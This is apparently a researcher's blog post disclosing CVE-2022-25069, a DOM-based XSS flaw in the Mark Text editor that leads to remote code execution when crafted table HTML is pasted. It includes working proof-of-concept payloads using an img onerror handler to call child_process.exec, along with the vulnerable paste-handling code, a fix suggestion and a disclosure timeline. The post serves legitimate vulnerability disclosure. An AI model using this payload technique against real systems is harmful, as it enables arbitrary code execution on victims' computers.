본문 바로가기
보안/CVEs

CVE-2022-25069: Mark text : Remote code execution through pasting content

by luiseok 2022. 3. 15.

About

Mark text (https://marktext.app/) is a markdown editor built with electron.js and vue.js v2.6.14. I've discovered containing a DOM-based cross-scripting (XSS) vulnerability that allows attackers to perform remote code execution via pasting a crafted payload from a clipboard.

Details

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The above HTML is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script.

 ContentState.prototype.checkCopyType = function (html, text) { 
   let type = 'normal' 
   if (!html && text) { 
     type = 'copyAsMarkdown' 
     const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim()) 
     if (match && match[1]) { 
       const tag = match[1] 
       if (tag === 'table' && match.length === 3 && match[2] === 'table') { 
         // Try to import a single table 
         const tmp = document.createElement('table') 
         tmp.innerHTML = text 
         if (tmp.childElementCount === 1) { 
           return 'htmlToMd' 
         } 
       } 
  
       // TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX. 
       type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type 
     } 
   } 
   return type 
 }

 

 

GitHub - marktext/marktext: 📝A simple and elegant markdown editor, available for Linux, macOS and Windows.

📝A simple and elegant markdown editor, available for Linux, macOS and Windows. - GitHub - marktext/marktext: 📝A simple and elegant markdown editor, available for Linux, macOS and Windows.

github.com

As you can check from the code, there was only a Regular expression that checks if the pasted text is an HTML, and is a <table> tag or not.

 

So that was a weak point. It must have been checked or sanitized before pasting the text. But it did not.

As a result, the attacker was able to take full control of the victim's computer.

Example

When pasting crafted payload into marktext linux application
When pasting crafted payload into marktext windows application

Solution

This issue should be fixed by adding child element's sanitizing process.

Timeline

2022-02-08 Vulnerability found and the issue was registered to Marktext's Github

2022-02-10 Problem fixed, requested for CVE ID

2022-03-05 CVE ID issued (CVE-2022-25069)

References

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-25069
  2. https://github.com/marktext/marktext/issues/2990
  3. https://github.com/marktext/marktext/pull/3002 

 

Footnote

This was my first experience finding open source vulnerability and issuing CVE ID. It was really thrilling and I felt a lot of accomplishment.
I would like to express my gratitude to Oscar for giving this experience as much courage as possible.​